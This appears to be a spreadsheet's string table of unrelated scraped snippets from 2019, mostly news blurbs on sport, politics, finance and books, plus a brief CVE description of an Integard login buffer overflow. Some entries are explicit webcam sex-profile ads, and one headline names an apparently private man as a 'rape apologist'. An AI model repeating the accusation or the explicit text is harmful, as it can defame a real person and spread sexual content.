    <t>No. 12 Texas A&amp;M faces one of the toughest schedules in the country this season, and the first of many daunting tests comes for this week as the Aggies hit the road to play No. 1 Clemson in Death Valley. It’s not a game that should be intimidating on its own to Texas A&amp;M after Kellen Mond threw for 430 yards and three touchdowns against the Tigers last year in College Station, Texas, coming one failed two-point conversion short of forcing overtime against the eventual national champions. But the oddsmakers see this matchup as far more lopsided than the top-12 matchup might suggest, favoring Clemson by more than 17 points on Saturday afternoon. Dennis Dodd will be at the game for CBS Sports, and during his visit on the Cover 3 Podcast this week, we discussed how Texas A&amp;M</t>
  </si>
  <si>
    <t>Trump repeatedly prodded Ukraine's new leader to work with Rudy Giuliani and the US attorney general to investigate Joe Biden, according to a five-page document summarising the phone call.</t>
  </si>
  <si>
    <t>lottoguru</t>
  </si>
  <si>
    <t>$2 Million Tuesday 3 September 2019 – Draw 1333 44 38 39 23 6 13 27 7 2 Results for OzLotto Draw 1333 The Lotto Results have been released for Tonight’s OzLotto You can view the full Lotto Results online with us at NetLotto. https://www.netlotto.com.au/Lotto-Results We provide all Australian Lottery results quickly and easily online, and our new IPhone App means your never a click away to find out if you were a winner. Check out the new App here Love your OzLotto ? For OzLotto, always buy tickets and get results online or by phone with NetLotto. We are the smart choice for all things OzLotto! Give the OzLotto a go. You never know where it may take you! Join Netlotto today to get lotto tickets and syndicates https://www.netlotto.com.au</t>
  </si>
  <si>
    <t>Price increases were highest in Halifax, Ottawa-Gatineau and Montreal The post Home prices rose for fourth straight month in August appeared first on Advisor.</t>
  </si>
  <si>
    <t>My Kinks: role play, strip, foot fetish Webcam profile: Love to tease you, my sensual side hides a wild one which will take you straight in heaven. I like exploring new things, like every inch of your body. Favourite sex position: doggy style, oral sex, on the top What I do in my amateur show: I love having fun with new sex scenarios. What I don’t like: A man who does not make compliments Gallery</t>
  </si>
  <si>
    <t>Extinction Rebellion blocks three entrances at Valero - one of the biggest refineries in Europe. The post Extinction Rebellion blocks road to Pembroke Dock Valero appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>Robyn Grace</t>
  </si>
  <si>
    <t>Melbourne Express is your morning primer - a live blog with breaking news, headlines, transport updates and weather.</t>
  </si>
  <si>
    <t>Glenda Young</t>
  </si>
  <si>
    <t>The previews are in from ITV for next week’s Coronation Street and Fiz sets up a meeting to discuss...</t>
  </si>
  <si>
    <t>Catholic Archbishop Anthony Fisher says that at Christian schools, parents “expect the Christian positions on marriage to be taught” similarly to how one would expect “Muslim positions being taught" at a Muslim school. Speaking with Sky News host Andrew Bolt the Archbishop pointed out that in the same regard “several positions” on marriage could potentially be taught at a state school. He said teachers’ position on marriage should be aligned with the school they are teaching at, “in respect for the parents, in respect for the children who want to be taught, presumably by teachers who are not phonies who really believe the school’s line". “If you’re not in favour of what your school teaches, you’re probably in the wrong place,” he said. The Archbishop’s comments came in relation to the recent resignation of Christian school teacher, Rachel Colvin, who claimed she was pressured to leave based on her personal disagreement with Ballarat Christian College’s stance on marriage. Image: News Corp Australia</t>
  </si>
  <si>
    <t>Dr. Bradley</t>
  </si>
  <si>
    <t>Altima Promenade Dental Centre Dentist in Vaughan 1 Promenade Circle, Unit #185, Thornhill, Vaughan, ON L4J 7Y3 (905) 707-1010 Apple Day Dental Dr.Alex Pister Dentist in Vaughan. Locate and compare Dentists in Vaughan ON, Yellow Pages Local Listings. Find useful information, the address and the phone number of the local business you are looking for. Thoughts of going to a dental clinic usually evoke frightening. Durban Dental Laboratories – Health clinic in Vaughan, ON – 40 Pippin Road, Vaughan, Ontario. Read verified and trustworthy customer reviews for Durban Dental Laboratories or write your own review. Mental health, vaping, vaccinations on Hamilton public health’s back to school checklist – This is one man. at its clinic in downtown on King street. X-rays, dental fillings, uncomplicated tooth extractions, and. Looking for a Dental Clinic or Dentist in Vaughan, Ontario? Count on Dentistry On Jane when you require Dentists Searching for a dentist in the Vaughan area? The answer is Dentistry On Jane, located in Maple Ontario. Dentistry on Jane in Vaughan. Campus life in Ottawa is about to change. Just how much, no one knows – A lot of things are about to change on campuses across Ontario. one Carleton student who declined to be named: “I just. Top Dental Clinic Near Vaughan New dentists hang on by their teeth – The debt load of a public school dental education increased by 133%, including undergraduate school, living expenses and fees. Our dental office proudly serves the Vaughan, Woodbridge, Maple and Richmond Hill areas offering general dentistry, The clinic provides a wide range of dental services – everything from MISSISSAUGA, Ontario. One (1) further Common Share at the price of $0.20, exercisable for a period of two years from the. Ontario Vaughan Clinics – Dental in Vaughan 622 results for Clinics – Dental in Vaughan, ON Highland Centre Dental Clinic (3.8 km) 3300 Rutherford Rd Vaughan, ON, L4K 5Z2 905-303-2777 Family &amp; Cosmetic Dentistry. Invisalign, Preventative. Highest Rated Dentist In Vaughan TORONTO — Cannabis company CannTrust Holdings Inc. says its manufacturing facility in Vaughan, Ont., has been rated. Number 1 Dental Clinic In Vaughan Locate and compare Dentists in Vaughan ON, Yellow Pages Local Listings. Find useful information, the address and the phone number of the local business you are looking for. Thoughts of going to</t>
  </si>
  <si>
    <t>Sam Quinn</t>
  </si>
  <si>
    <t>Kevin Durant has given a number of reasons for leaving the Golden State Warriors. He has spoken about his admiration for the Brooklyn Nets‘ organization on several occasions. He told J.R. Moerhinger of The Wall Street Journal that he never felt like he truly fit in with the Warriors because they had already won a championship before his arrival. Most superstars avoid talking about their ex teams and the reasons for their free agency decisions, but Durant has been incredibly open about his choice. That continued at Nets media day on Friday. With few details left to fill in, Durant gave a very simple answer for his decision to join the Nets. He did so because he wanted to. Durant revealed that he communicated with Kyrie Irving and DeAndre Jordan in the days leading up to free agency to</t>
  </si>
  <si>
    <t>The Cubs lead the majors in bullpen spending — $65 million including pitchers who are injured or have been released — but keep losing bullpen games. Look for big changes after the season, with Joe Maddon on thin ice and the cast working in front of Craig Kimbrel likely to turn over. Source: Sports Business News</t>
  </si>
  <si>
    <t>A CONFESSION is set to air this evening as Martin Freeman stars as Steve Fulcher in the real life police drama but the actor was a little nervous about starring in the role because of its true-to-reality script. Daily Express :: TV and Radio Feed</t>
  </si>
  <si>
    <t>Australia have retained the Ashes on foreign soil for the first time in 18 years after a nailbiting win in the last session of the Test match.</t>
  </si>
  <si>
    <t>African heads of state joined thousands of Zimbabweans at a state funeral ON Saturday for Zimbabwe’s founding president Robert Mugabe whose burial has been delayed for at least a month until a special mausoleum can be built for his remains.</t>
  </si>
  <si>
    <t>Melbourne’s only luxury five-star hotel outside the CBD at Chadstone is set to open officially on November 1.</t>
  </si>
  <si>
    <t>Italian Polish Dictionary – travel dictionary to translate Italian to Polish. Click on the list to show Italian or Polish synonyms to understand the broader use of the words. The learning games help to build vocabulary. View the history of words used in the game again clickable for synonyms. Ideal for travelers, business people or … Continue reading Italian Polish Dictionary →</t>
  </si>
  <si>
    <t>THE month of Muharram is upon us, and Muslims will soon be commemorating the holy day of Ashura. What are the Islamic calendar dates for 2019, or the year 1441? Daily Express :: Life and Style Feed</t>
  </si>
  <si>
    <t>Source: http://feedproxy.google.com/~r/typepad/alleyinsider/silicon_alley_insider/~3/GGl93B9jl6E/verizon-executive-joins-goldman-sachs-tech-2019-9 A Verizon executive is joining Goldman Sachs as chief technology officer as the Wall Street bank reshuffles its ranks Verizon Media Group executive Atte Lahtiranta is joining Goldman Sachs as chief technology officer, according to a memo on Thursday. He joins amid broader executive changes in the bank’s technology division. A former Verizon Media Group executive is joining Goldman Sachs as chief technology officer as the Wall Street firm overhauls its tech division for the future. Atte Lahtiranta replaces John Madsen and will work closely with the firm’s co-chief information officer George Lee, according to a Thursday memo seen by Business Insider. Lahtiranta, who comes on board Goldman as a partner, was formerly chief technology at Verizon Media Group (previously known as Oath). He was formerly a senior fellow and architect at Yahoo, and also held technology leadership roles at ShopAdvisor and Nokia. Read more: Marty Chavez is retiring from Goldman Sachs. We chatted with him about the bank’s tech transformation, why now is the right time for him to step down, and what he’s planning next. Lahtiranta joins Goldman amid broader executive changes in the firm’s technology division. Goldman’s co-chief information officer Elisha Wiesel is retiring from Goldman, according to a separate memo, and will be replaced by former Amazon Web Services executive Marco Argenti. Marty Chavez, the bank’s technology evangelist and cohead of the securities division, also said last week will retire at the end of the year. David Solomon has been cleaning house a year into his tenure as Goldman CEO, with roughly 50 partners — the most senior employees at the bank — announcing their intentions to leave since the end of 2018. The partnership is now around 450 people. Solomon has been trimming those ranks and making the partnership more exclusive, including leaning towards individuals who are in revenue-producing roles. To be sure, the rank of Goldman Sachs partner is still one of the most sought after titles on Wall Street, largely for the wealth it can bring. Goldman has also been hiring more for partners and other senior-level roles from the outside, in a departure from its historical focus of largely promoting from within. Join the conversation about this story » NOW WATCH: The US women’s national team dominates soccer, but here’s why the US men’s team sucks Source: http://feedproxy.google.com/~r/typepad/alleyinsider/silicon_alley_insider/~3/GGl93B9jl6E/verizon-executive-joins-goldman-sachs-tech-2019-9 The post A Verizon executive is joining Goldman Sachs as chief technology officer as the Wall Street bank reshuffles its ranks appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>The Australian team is right on track for next year's Olympic Games, achieving its goals in the recent test event and World Cup in Japan.</t>
  </si>
  <si>
    <t>The Kingdom and oil and gas industry have been slow to shore up defenses, raising red flags about the possibility of longer term fall-out in the region.</t>
  </si>
  <si>
    <t>sk94</t>
  </si>
  <si>
    <t>Found this while browsing for a new headunit, cheapest price it's been. Personally I like this one cause it has physical Vol and Seek buttons. Comes with a free reverse camera, no idea on the quality/model though. Original Coupon Deal</t>
  </si>
  <si>
    <t>He is a member of one of the most notorious street gangs in New Zealand and has served time in prison for disturbing crimes, but this tatted gangster says he has turned his life around with one unexpected hobby.</t>
  </si>
  <si>
    <t>10-man EDS slip up at Derby Original Source City’s EDS side suffered a frustrating afternoon at Pride Park as two second half goals secured a Premier League 2 victory for the young Rams. A Jahmal Hector-Ingram penalty and an injury time effort by Morgan Whittaker proved the difference. And a disappointing afternoon was compounded by a red card for skipper Taylor Harwood-Bellis. What happened City started brightly on the back of our fine UEFA Youth League win at Shakhtar Donetsk in midweek and Jayden Braaf almost gave us the perfect start. After a slick move up the left flank, the Dutchman fired in a fine effort, but Derby keeper Matthew Yates got down low to save the effort. In a tightly contested first half, the hosts then came close themselves to breaking the deadlock just before the half hour Josh Shonibare’s effort was blocked by keeper Gavin Bazunu but looked to be rolling over the line before being hooked clear. However, City’s task suddenly got a whole lot harder eight minutes after the restart after skipper Taylor Harwood-Bellis was shown the red card for a second bookable offence. And Derby then took full advantage after City infringed in our penalty area as Jahmal Hector-Ingram converted from the spot. With a numerical advantage Derby upped the pressure and it needed a smart save by Bazunu to deny Max Bird a second goal for the hosts on 74 minutes. And a disappointing afternoon was sealed in injury time when Morgan Whittaker doubled the hosts’ advantage to seal victory. How we lined up Gavin Bazunu was in goal shielded by a back four of Alpha Dionkou, Yeboah Amankwah, Taylor Harwood-Bellis, Tyreke Wilson. Iker Pozo was the midfield anchor with Fisayo Dele-Bashiru while Adrian Bernabe and Jayden Braaf provided the width on either wing. Ben Knight and Nabil Touaizi carried the threat up-front. What it means The result sees City remain in 10th place in the table on four points. What’s next Our Under-21s return to Leasing.com Trophy action on Tuesday evening when we travel to take on Bradford City at Valley Parade, looking to build on our opening group victory away at Rochdale. Kick-off in Yorkshire is at 7.30pm.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10-man EDS slip up at Derby appeared first on Premier League. Follow us on our social networks Posted on Bible Of Sport Bible Of Sport - Instagram Bible Of Sport - Twitter Bible Of Sport - Facebook Source link</t>
  </si>
  <si>
    <t>Ryan Mondoley from Las Vegas, Nevada is a rape apologist, and a victim blaming scumbag The post Ryan Mondoley from Las Vegas, Nevada is a rape apologist, and a victim blaming scumbag appeared first on Cheater Xposed - Cheater Exposed USA.</t>
  </si>
  <si>
    <t>Ellie Honeybone</t>
  </si>
  <si>
    <t>Fyfe's tiny home town of 500 people has produced more than its fair share of AFL and AFLW stars, with nine local players making it to the top in recent years.</t>
  </si>
  <si>
    <t>Heading Home: the Tale of Team Israel makes its debut in New York and Los Angeles as the baseball team plays in Olympic qualifying rounds in Germany. Source: Sports Business News</t>
  </si>
  <si>
    <t>Shaan RaySep 04, 2019 09:13:14 IST To understand the difference between a blockchain and a traditional database, it is worth considering how each of these is designed and maintained. Traditional Databases Traditional databases use client-server network architecture. Here, a user (known as a client) can modify data, which is stored on a centralised server. Control of the database remains with a designated authority, which authenticates a client’s credentials before providing access to the database. Since this authority is responsible for administration of the database, if the security of the authority is compromised, the data can be altered, or even deleted. Traditional database. Blockchain Databases Blockchain databases consist of several decentralised nodes. Each node participates in administration: all nodes verify new additions to the blockchain, and are capable of entering new data into the database. For an addition to be made to the blockchain, the majority of nodes must reach a consensus. This consensus mechanism guarantees the security of the network, making it difficult to tamper with. In Bitcoin, consensus is reached by mining (solving complex hashing puzzles), while Ethereum seeks to use proof of stake as its consensus mechanism. Integrity and Transparency A key property of blockchain technology, which distinguishes it from traditional database technology, is public verifiability, which is enabled by integrity and transparency. Integrity: Every user can be sure that the data they are retrieving is uncorrupted and unaltered since the moment it was recorded Transparency: Every user can verify how the blockchain has been appended over time A map of Dash masternodes distributed across the world. CRUD vs Read and Write Operations In a traditional database, a client can perform four functions on data: Create, Read, Update and Delete (collectively known as the CRUD commands). The blockchain is designed to be an append-only structure. A user can only add more data, in the form of additional blocks. All previous data is permanently stored and cannot be altered. Therefore, the only operations associated with blockchains are: Read Operations: These query and retrieve data from the blockchain Write Operations: These add more data onto the blockchain Validating and Writing The blockchain allows for two functions: validation of a transaction, and writing of a new transaction. A transaction is an operation that changes the state of data that lives on the blockchain. While past entries on the blockchain must always remain the same, a new entry can change the state of the data in the past entries. For example, if the blockchain has recorded that my Bitcoin wallet has 1 million BTC, that figure is permanently stored in the blockchain. When I spend 200,000 BTC, that transaction is recorded onto the blockchain, bringing my balance to 800,000 BTC. However, since the blockchain can only be appended, my pre-transaction balance of 1 million BTC also remains on the blockchain permanently, for those who care to look. This is why the blockchain is often referred to as an immutable and distributed ledger. (Also read: Understanding blockchain technology and its implications on the future of transactions) A map of Dash masternodes distributed across the world. In short, the difference is Decentralised Control Decentralised control eliminates the risks of centralised control. Anybody with sufficient access to a centralised database can destroy or corrupt the data within it. Users are therefore reliant on the security infrastructure of the database administrator. Blockchain technology uses decentralised data storage to sidestep this issue, thereby building security into its very structure. Though blockchain technology is well-suited to record certain kinds of information, traditional databases are better suited for other kinds of information. It is crucial for every organisation to understand what it wants from a database, and gauge this against the strengths and vulnerabilities of each kind of database, before selecting one. The author is the head of Denver Hill, a group that uses emerging technologies like blockchain, artificial intelligence, additive manufacturing and the industrial internet to create new products and processes. Find our entire collection of stories, in-depth analysis, live updates, videos &amp; more on Chandrayaan 2 Moon Mission on our dedicated #Chandrayaan2TheMoon domain.</t>
  </si>
  <si>
    <t>PRINCE HARRY has been given some words of advice by his late mother Princess Diana’s former private secretary ahead of his 10-day trip to Africa. Daily Express :: News Feed</t>
  </si>
  <si>
    <t>Sukunat omon qolishdir. Emili Blunt va Jon Krasinski bosh rollarini o'ynagan #AQuietPlace uchun tizer treylerini tomosha qiling. Teatrlarda 2018 yil […] The post Jim joy (2018) – Rasmiy tizer treyleri – Paramount Pictures appeared first on Shop Reviews.</t>
  </si>
  <si>
    <t>My Kinks: Smoking, Wet &amp; Messy, Tattoos Webcam profile: I love exploring new ground, my willingness and courage to initiate action can make the perfect mate for you! Even if I like to experiment and sometimes take things to the limit, I hope you won`t feel overwhelmed and you will feel free to explore anything you wish for about us! Favourite sex position: 69 What I do in my amateur show: Seduce my mind and you can have my body! Find my soul and I am yours forever! What I don’t like: Promises never kept and leaving without saying good bye! Rushing like i am doll to get undressed in a heartbeat. Gallery</t>
  </si>
  <si>
    <t>Lamar Odom describes Dancing With the Stars rehearsals as harder than NBA practices Original Source Ex-NBA player Lamar Odom is set to participate in the upcoming season of ‘Dancing with the Stars,’ where he described the rehearsals as more difficult than NBA practices, per US Magazine’s Jessica Vaco-Bolanos. Odom is once again trying to turn his life around after yet another setback. He was recently deactivated by the Big3 after it was found out that he was out of shape. The two-time NBA champion has expressed his interest to continue playing professional basketball, and one of his ways to stay in shape is by joining DWTS. The 39-year-old said that he has given up porn and candy as he hopes to get another shot at either the NBA or the Big3. He’s also open to playing overseas, particularly in the Philippines, if he won’t be able to get an opportunity in the US. Odom is obviously trying to make up for his mistakes in the past, and while it is unclear if he will ever get a shot in the NBA or the Big3, the good thing is he’s doing the right things. He has hit rock-bottom before and he understands that it won’t be easy to recover from that, but Odom seems to be very determined to prove not only that he can still play, but also be good. Maybe Odom’s stint with Dancing with the Stars is the start of better things for him, and at this point, we could only wish him nothing but the best. Hopefully, he gets everything right this time around.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‘819338648198169’); fbq(‘track’, “PageView”); fbq(‘track’, ‘ViewContent’);(function(d, s, id) var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = “http://connect.facebook.net/en_US/sdk.js#xfbml=1&amp;version=v2.4”; fjs.parentNode.insertBefore(js, fjs); (document, ‘script’, ‘facebook-jssdk’));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Lamar Odom describes Dancing With the Stars rehearsals as harder than NBA practices appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>LSE Chairman Don Robert delivered one of the most brutal takeover rejections in recent memory with a laundry list of reasons why the $53.5 billion bid is wanting.</t>
  </si>
  <si>
    <t>At the time of writing the GBP/EUR exchange rate is trading at €1.1261, down roughly 0.3 percent from this morning’s opening levels. This comes as data revealed a marked improvement in German economic sentiment for September. Daily Express :: City and Business Feed</t>
  </si>
  <si>
    <t>David Parnham also sent letters containing white powder to Theresa May, David Cameron and two bishops. The post Fake poison letter to Queen sparked major alert, court told appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>Do you thrive in fast-paced environments and possess a passion for supporting multiple projects impacting a growing global organization? Our high-profile Vancouver client is seeking to hire an Agile Technical Project Manager, on a long term contract with a strong probability of extension. Apply to this amazing Agile Technical Project Manager opportunity today! What’s in .. Read more</t>
  </si>
  <si>
    <t>Sarah Hughes</t>
  </si>
  <si>
    <t>Benjamin Myers’ latest novel begins with a 16-year-old boy setting out one summer morning after the Second World War to walk the Durham countryside in which he lives. It’s a last journey before he heads towards a mining job he is not sure he wants. “At home I exhausted all the possibilities… I wanted to experience so much more of what was happening out there, beyond the confines of the rural colliery village… I wanted to be surprised.” Reading those early passages, it’s impossible not to think of Laurie Lee’s classic, As I Walked Out One Midsummer Morning, in which the author looked back over a pre-war walk from his Slad Valley home to London, Spain and ultimately a civil war. The Offing, similarly, is written from a position of old age, as Robert Appleyard, now an elderly writer, records the transformative summer of his life. Myers, the winner of last year’s Walter Scott prize for the dark and gory The Gallows Pole, has a different inspiration in mind: The Offing begins with a quote from the 19th-century poet John Clare’s “The Flitting”, which similarly celebrates and mourns the ghosts of countryside past. Myers, too, is concerned with a changing world – and his sparse, beautifully written book captures it. Robert has spent the “larger part of my young years… staring out of classroom windows longing for a life lived outside”. It is an observation made doubly poignant by the knowledge that it is a life lived largely underground that awaits. Or does it? For The Offing is also a coming-of-age novel, and thus alive to the glorious possibility of change. As Robert walks on, so he reaches the former smuggling village of Robin Hood’s Bay in the North York Moors, where, in a ramshackle cottage, he meets Dulcie Piper, an eccentric elderly woman who lives alone with her German shepherd, and the secrets she wishes she couldn’t recall. Shot through with melancholy, desire and a fierce longing for the countryside Dulcie and Robert’s late-night conversations, in which she opens up a world of writing, song and wonderfully cooked food – suggesting there is another way of life – form the centrepiece of an increasingly emotional story. In less astute hands, their relationship would echo any number of TV shows and films, but Myers takes his time in depicting both their blossoming friendship and revealing Dulcie’s past. Gradually, The Offing takes on a pull as great as that of the turbulent sea which drew Dulcie’s former lover, a young German poet called Romy Landau, repeatedly to its shores. Robin Hood’s Bay, North Yorkshire (Photo:Tony Bartholomew) There are hints of JL Carr’s A Month in the Country and the early works of DH Lawrence, whose relationship with Jessie Chambers, while very different, provided a similar opportunity for escape. Myers, whose seven previous novels have covered topics from the disappearance of Manic Street Preachers’ Richey Edwards to bleak but brilliant crime fiction, wears his influences lightly. Read more: The Testaments by Margaret Atwood, review: a terrific tale of hope and hate The book’s title refers to “the distant stretch of sea where sky and water merge” – an image used to conjure up both the almost invisible transition that Robert is making from adolescence to adulthood, and the yearning that Dulcie feels for her lost romance. The result is a tight, lyrical and almost painfully truthful novel shot through with melancholy, desire and a fierce longing for the countryside through which Robert tramps. A meditation on an England long gone and a lament for the countryside we fail to notice now, it confirms Myers’ place as one of the best writers of nature at work today. The Offing by Benjamin Myers is published by Bloomsbury (£16.99) Read more Book Reviews The Testaments by Margaret Atwood: Brutal and beautiful ★★★★★ Tastes of Honey, by Selina Todd: breezy biography of Shelagh Delaney What Happens Now? by Sophia Money-Coutts: 'A charming read' Quichotte by Salman Rushdie: a wildly entertaining return to form This is Not Propaganda by Peter Pomerantsev: 'Compelling' Ask Again, Yes by Mary Beth Keane: 'a compelling, devastating story' The post The Offing by Benjamin Myers: a tight, lyrical and painfully truthful novel appeared first on inews.co.uk. The post The Offing by Benjamin Myers: a tight, lyrical and painfully truthful novel appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>Player ratings for Pistons in NBA 2K20 Original Source Detroit Pistons’ Luke Kennard, Andre Drummond and Reggie Jackson. (Photo by Michael Reaves/Getty Images) NBA 2K20 is here. The game’s creators are finally releasing the remaining ratings for each player – including the Detroit Pistons. This year’s edition of the NBA 2K video game has a lot to catch up on. After one of the busiest offseasons in NBA history, several players are landing in different cities and another draft of young, exciting players is incoming. NBA 2K20’s release on Sept. 6 brings with it the controversial conversations of player ratings. The game’s developers began building the hype by releasing ratings piece-by-piece in June, beginning with the NBA’s 20 best players, and later by request of both fans and players online. Not surprisingly, LeBron James and Kawhi Leonard were top of the class, tying for the game’s highest rating this year at 97. However, the initial countdown of players included just one player from the Pistons. Blake Griffin: 88 Overall Pistons star Blake Griffin was one of the first ratings released. He came in ranked No. 20 on the game’s ratings list at an 88 overall. Griffin is in the company of Rudy Gobert, Jimmy Butler, and Kemba Walker who all also clocked in at 88 overall.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Player ratings for Pistons in NBA 2K20 appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>The Winnipeg Jets have suspended defenceman Dustin Byfuglien for refusing to report to training camp, according to multiple reports. CBC | Sports News</t>
  </si>
  <si>
    <t>Paul Hensby</t>
  </si>
  <si>
    <t>Despite scoring points in both the Belgian and Italian Grand Prix, Sergio Pérez has admitted that neither event were that easy for the Racing Point F1 Team, but it at least felt to him that he has finally got his season underway after a testing opening part of 2019 for the Mexican. Pérez went eight rounds without a top ten finish between the Azerbaijan Grand Prix in April and the Belgian Grand Prix at the beginning of September before he clinched a sixth-place finish at Spa-Francorchamps, a result he followed up with a seventh-place result at the Autodromo Nazionale Monza. The results of the past two events have moved Pérez up to thirteenth in the Drivers’ Championship standings, and he feels the hard work being done back at Racing Point’s factory at Silverstone is beginning to pay off. “Spa and Monza were not easy weekends, but we scored important points and it feels as though my season is properly underway now,” said Pérez. “The hard work at the factory is paying off and we are doing a good job at the track too. “There’s a great feeling in the team just now: a nice atmosphere and excitement about the rest of the year.” Pérez says he always enjoys racing around the Marina Bay Street Circuit, the venue for this weekend’s Singapore Grand Prix, despite the heat and humidity playing a big part in proceedings. He says it is important to have done the hot weather fitness training in order to be ready for the gruelling near two-hour race on Sunday. “I always enjoy racing in Singapore,” said the Mexican. “The city has so much energy and the track is a challenge. It’s physically difficult with the heat and humidity and, because it’s a street circuit, there’s little margin for error. “When you’re driving, you’re sweating so much. That’s why you need to make sure you’ve done your fitness training in hot conditions too. You need to be ready because it’s hard to breathe sometimes. It’s also the longest race of the year in terms of duration. “We stay in hotels next to the track and you really feel so close to everything. You walk to the track with the fans and you get to feel the buzz and atmosphere in the city. That makes it quite different from other races too. It’s a great place to have a race and when the sun sets the track looks really beautiful under the lights.” Pérez feels he has had some good drives in Singapore, with seven top ten finishes in his eight starts there. His unbroken points run at Marina Bay came to an end in 2018 when he finished sixteenth after contact with Williams Racing’s Sergey Sirotkin and a subsequent penalty for causing the collision ended his chance of a top ten result. “I’ve had some good drives in Singapore over the years,” admitted Pérez. “It’s a track layout I like and I have always enjoyed street tracks. You have to be aggressive and accurate and it’s a track where you can make the difference as a driver.”</t>
  </si>
  <si>
    <t>Riverdale star Vanessa Morgan isn’t shy when it comes to showing off her incredible body. On Sunday, the Toni Topaz actress shared a sexy snap on Instagram for her 6.9 million followers to enjoy. In the aerial shot, the stunner is seen relaxing in a pool overlooking the beach. The 27-year-old wore a barely-there, pink bikini. Her toned derriere and long, lean legs were on full display. Vanessa’s co-star Madelaine Petsch was quick to compliment the beauty. “Bomb,” wrote Madelaine, adding a string of fire emoji to the comment. Fans of the former Disney Channel star seemed to love the cheeky snap. “HOW ARE YOU SO GORGEOUS OMG,” wrote a fan. “WHY [ARE] YOU SO PERFECT??????” asked another. “Omg so hot,” chimed in a third Instagram user. The provocative post has racked up more than 510,000 likes. Click here to continue and read more… The Inquisitr ‘Riverdale’ Star Vanessa Morgan Exposes Perky Derriere In Thong Bikini</t>
  </si>
  <si>
    <t>Daniel Cherny</t>
  </si>
  <si>
    <t>Norm Smith medallist Steve Johnson is expecting friend and former teammate Toby Greene to shine in Saturday’s grand final, declaring that the roguish forward “would do anything to win”.</t>
  </si>
  <si>
    <t>Lucy Stone</t>
  </si>
  <si>
    <t>Brisbane City Council has released its preliminary business plan for a pedestrian and cycling bridge linking Kangaroo Point with the city.</t>
  </si>
  <si>
    <t>The families of Australian tourist Lucas Fowler, 23, and his American girlfriend Chynna Deese, 24, have been asked to prepare statements about their tragic loss ahead of the Royal Canadian Mounted Police revealing the results of investigations into their deaths.</t>
  </si>
  <si>
    <t>submitted by /u/HilliTech [link] [comments] Watch Time Stories: Ian Blackburn, the Apple Watch triathlete</t>
  </si>
  <si>
    <t>Ryan Lilly</t>
  </si>
  <si>
    <t>Colin Appleyard‘s Integro Yamaha team wrapped up the 2019 championship at the Dutch round of the 2019 Dickies British Supersport championship with two Supersport wins from Irishman Jack Kennedy, and a podium finish for Brad Jones. In what has been a remarkable season for both Kennedy and Jones, the team celebrated their third Supersport crown after two hard-fought races at Assen. Kennedy, who had won ten races on the bounce up until his second race crash at Oulton Park, currently sits on top of the championship and looks set to wrap up his second consecutive Supersport championship at Donington Park in two weeks time, whilst his teammate Brad Jones lies second in the standings. Mathematically Alistair Seeley cannot win the championship after missing the Dutch round of the championship after a crash at Oulton Park left the ‘Wee Wizard’ sidelined with a broken wrist. That means Appleyard’s are set to wrap up the 2019 title with Kennedy leading teammate Jones by seventy-one points with one hundred points up for grabs.</t>
  </si>
  <si>
    <t>villafenice-candles</t>
  </si>
  <si>
    <t>Halloween Melts Package -Fragrances are Pumpkin Pie Forbidden Fantasy Embers Dragons Blood 30ml Melts for $5 Cod available and postage will be calculated on postage address</t>
  </si>
  <si>
    <t>Adam Turner</t>
  </si>
  <si>
    <t>You shouldn't have to resort to funny accents and made-up family members to get your smart home working properly, but sometimes you do.</t>
  </si>
  <si>
    <t>Works like this: I feed you Moon Nukers a straight line, and you hit me with a punch line in the comments. Facebook is planning to replace “likes” with… 0 0</t>
  </si>
  <si>
    <t>Taylor Pendrith of Richmond Hill, Ont., has won his second event this season on the Mackenzie Tour-PGA Tour Canada, this time at the Mackenzie Investments Open at Montreal’s Elm Ridge Country Club, with one tournament left on the schedule. Click Play below to hear his chat afterwards with Hutch.</t>
  </si>
  <si>
    <t>The web server in Integard Pro and Home before 2.0.0.9037 and 2.2.x before 2.2.0.9037 has a buffer overflow via a long password in an administration login POST request, leading to arbitrary code execution. Published at: September 13, 2019 at 05:15PM View on NVD website The post New vulnerability on the NVD: CVE-2010-5333 appeared first on Secured Me.</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</si>
  <si>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Can Boyle keep modern Bond relevant? by USA Consumer Credit Counseling, Felipe Escobar on Monday 16 September 2019 12:31 AM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Can Boyle keep modern Bond relevant? Sunday 15 September 2019 11:53 PM UTC-05 | Tags: consumer-credit-counseling-service https://m.youtube.com/watch?v=LrgOi_dw7sQ Will it be a case of Bond, James Bond or will 007 find his Martini both shaken and stirred? Tags: High Point, North Carolina Consumer Credit Counseling Service | (888) 551-1270 via Can Boyle keep modern Bond relevant? September 15, 2019 at 11:48PM Copyright © September 15, 2019 at 11:48PM Tags: consumer-credit-counseling-service</t>
  </si>
  <si>
    <t>Source: https://techcrunch.com/2019/09/05/porsche-taycan-configurator-the-9-details-that-stood-out/ Porsche Taycan configurator: The 11 details that stood out The Porsche Taycan is here — actually two flavors, the Turbo S and the Turbo — in case you haven’t seen the deluge of media coverage. The upshot: The “lower-priced” Turbo starts at $150,900 while the Turbo S begins at $185,000. While Porsche is promising cheaper variants of the Taycan next year, well-heeled drivers of the world will have to make do with these two options for now. But why limit yourself? It’s a Porsche, it’s a sports car, it’s a status symbol and it’s electric. Let’s get to work on some dual vice and virtue signaling. Luckily, the configurator is here, giving potential customers, Tesla fans and critics, or just regular folks dreaming of Porsche’s first electric car, a chance to design their very own Taycan. No strings attached. TechCrunch dove into the configurator. What we found were lots of opportunities to customize the vehicle, right down to the headlights, wheels and even the badge. Some of them are even “free.” Here are the most interesting options. For the purposes of this exercise, I’m going with the more frugal option, the Taycan Turbo. (And yes, the fact that an electric car has the word “turbo” attached to it has not escaped me or TechCrunch. I’ll remind everyone we live in a world where a four-door car is called a coupe.) And I’m looking for all of the opportunities to get the free stuff, unless it’s super cool, and then I’ll theoretically (because this is a game of pretend) spring for the add-on. Porsche unveils the $150,900 Taycan Turbo electric sedan 1. Record scratch Before I can even dive in, I am forced to choose a mobile charger for $1,120. There’s another more expensive charging option that includes a home energy manager for $1,660, but it’s not available yet. And now, I see another option that I am forced to pay for. The fixed panoramic roof in glass is $1,490. For now, the Turbo S and Turbo come with the glass roof, but instead of making it standard, this is a required add-on. That $150,900 car now costs $153,510. 2. The free colors and the one 